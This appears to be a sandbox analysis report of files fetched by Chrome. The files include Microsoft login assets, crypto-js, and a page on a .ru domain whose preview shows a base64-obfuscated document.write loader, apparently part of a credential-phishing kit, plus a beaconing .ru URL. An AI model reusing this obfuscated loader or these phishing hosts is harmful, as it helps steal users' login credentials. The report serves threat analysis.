                                                                Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                Category:downloaded
                                                                Size (bytes):673
                                                                Entropy (8bit):7.6596900876595075
                                                                Encrypted:false
                                                                SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                MD5:0E176276362B94279A4492511BFCBD98
                                                                SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:dropped
                                                                Size (bytes):2672
                                                                Entropy (8bit):6.640973516071413
                                                                Encrypted:false
                                                                SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):3.990210155325004
                                                                Encrypted:false
                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):48316
                                                                Entropy (8bit):5.6346993394709
                                                                Encrypted:false
                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (7565), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):20200
                                                                Entropy (8bit):5.889611832387824
                                                                Encrypted:false
                                                                SSDEEP:384:Lvnu5bKVUYDVHiq4nu5bKVUYDVHiqJlrClr+PQ:LSIvCq5IvCqJlrClrD
                                                                MD5:70056BB6CBF863B3912042FF57A8FB40
                                                                SHA1:D52A3C28325F86A07437C318BA6EA14675619F69
                                                                SHA-256:82BAB46B3333DC3226A3F5084860CB548722FA15F9B3235D0D90C3303177F698
                                                                SHA-512:ED2B1DEF444DD27E6665304C4B329F8DA6AD92471F023BF2B49DF0CC07F19DF510402F276210A855B7241DC03C3E2B9C4E9D22ED12A01AC39D0DD0DF452E74F2
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://a89.softevol.ru/5fsy/
                                                                Preview: Don&#039;t be distracted by criticism. Remember, the only taste of success some people get is to take a bite out of you. -->..<script>../* Don&#039;t be afraid to give up the good to go for the great. */..if(atob("aHR0cHM6Ly9BODkuc29mdGV2b2wucnUvNWZzeS8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                Category:downloaded
                                                                Size (bytes):20410
                                                                Entropy (8bit):7.980582012022051
                                                                Encrypted:false
                                                                SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:downloaded
                                                                Size (bytes):2672
                                                                Entropy (8bit):6.640973516071413
                                                                Encrypted:false
                                                                SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                Category:dropped
                                                                Size (bytes):5525
                                                                Entropy (8bit):7.961202222662501
                                                                Encrypted:false
                                                                SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:very short file (no magic)
                                                                Category:downloaded
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru/3671221770088554468995aJnxdglUKIEAPHRQJZVOEQDFDAWGIPHZAASEPLGEBBLDIFXAXHTEXGROCEYQWNX
                                                                Preview:1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                Category:downloaded
                                                                Size (bytes):35170
                                                                Entropy (8bit):7.993096534744333
                                                                Encrypted:true
                                                                SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                MD5:171A4DD9400708B88724B57D62B24A6A
                                                                SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                Category:dropped
                                                                Size (bytes):673
                                                                Entropy (8bit):7.6596900876595075
                                                                Encrypted:false
                                                                SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                MD5:0E176276362B94279A4492511BFCBD98
                                                                SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:downloaded
                                                                Size (bytes):3620
                                                                Entropy (8bit):6.867828878374734
                                                                Encrypted:false
                                                                SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                Category:dropped
                                                                Size (bytes):17174
                                                                Entropy (8bit):2.9129715116732746
                                                                Encrypted:false
                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57678
                                                                Category:dropped
                                                                Size (bytes):16378
                                                                Entropy (8bit):7.986541062710992
                                                                Encrypted:false
                                                                SSDEEP:384:hOBEj/gTOkWow647Z1Y8hyJavTiIQslkHC:hOBKJB11Y8heariIQ8ki
                                                                MD5:FC8A7FB6FB26ADEB81D76A33DA13B815
                                                                SHA1:ADEF9857A4FC698836B613252AE8B1FC0EC199DE
                                                                SHA-256:A3D6351A6E93FC23C2A3ABFFCBDC847D42B8781DBFFBCCEEF4FEF72E0D5D4A14
                                                                SHA-512:DE70865494E5D2A32353614CC7D8305CAA83E1605F6BF03C58DD6E19D92FDE8B33B3E26ED3A65D739DEA20984130D39B6E43641B04918CC906DEC17E51B0D582
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):48316
                                                                Entropy (8bit):5.6346993394709
                                                                Encrypted:false
                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                Malicious:false
                                                                Reputation:low
